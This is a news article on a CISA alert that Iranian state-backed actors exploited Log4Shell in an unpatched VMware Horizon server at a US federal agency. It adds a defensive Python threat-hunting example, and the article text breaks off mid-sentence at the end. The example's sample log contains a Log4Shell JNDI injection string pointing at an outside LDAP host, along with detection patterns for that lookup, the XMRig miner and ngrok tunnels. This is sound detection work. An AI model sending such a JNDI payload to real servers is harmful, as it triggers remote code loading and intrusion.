The US authorities have urged all agencies to patch VMware systems after revealing that Iranian state-backed actors exploited the Log4Shell bug to compromise a government organization.
The alert from the Cybersecurity and Infrastructure Security Agency (CISA) claimed the unnamed Federal Civilian Executive Branch (FCEB) organization was compromised as long ago as February 2022.
An incident response engagement starting mid-June uncovered the compromise, which used the infamous Log4j bug for initial access.
“In the course of incident response activities, CISA determined that cyber-threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” CISA said.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”
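An added, defender-side illustration of the threat hunting CISA recommends (example code written for this article, not from CISA or VMware): it runs one indicator rule for each of the three stages named in the quote (a Log4Shell JNDI lookup in a Horizon log, the XMRig miner, an Ngrok tunnel binary) over a handful of constructed events. The log names, file paths and addresses are assumptions, not indicators from the advisory.

```python
import re
from collections import defaultdict

# Constructed sample events for this example (not from the CISA advisory).
# Each tuple is (source, line): a VMware Horizon access log entry or a host process listing.
SAMPLE_EVENTS = [
    ("horizon_access.log",
     '203.0.113.7 - - "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.9:1389/a}"'),
    ("horizon_access.log",
     '192.0.2.5 - - "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"'),
    ("process_list", "PID 4120  C:\\ProgramData\\xmrig.exe -o pool.invalid:3333"),
    ("process_list", "PID 812   C:\\Windows\\System32\\svchost.exe -k netsvcs"),
    ("process_list", "PID 5532  C:\\Users\\Public\\ngrok.exe tcp 3389"),
]

# One rule per stage of the chain described in the advisory. The JNDI rule only catches the
# plain form of the lookup string; obfuscated variants need normalisation before matching.
RULES = {
    "initial_access_log4shell": re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.I),
    "cryptomining_xmrig": re.compile(r"\bxmrig(?:\.exe)?\b", re.I),
    "persistence_ngrok": re.compile(r"\bngrok(?:\.exe)?\b", re.I),
}


def classify(line):
    """Return the names of every rule the line matches (an empty list if none)."""
    return [name for name, rx in RULES.items() if rx.search(line)]


def hunt(events):
    """Group matching events by rule so an analyst can review each stage separately."""
    hits = defaultdict(list)
    for source, line in events:
        for name in classify(line):
            hits[name].append((source, line))
    return dict(hits)


def stages_observed(events):
    """Sorted names of the stages for which at least one event matched."""
    return sorted(hunt(events))


if __name__ == "__main__":
    for name, lines in hunt(SAMPLE_EVENTS).items():
        print(name)
        for source, line in lines:
            print(f"  [{source}] {line}")
```

Matches from all three rules on the same estate are the "assume compromise" signal the advisory describes; a single hit still warrants review, since any one stage can appear without the others.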
If…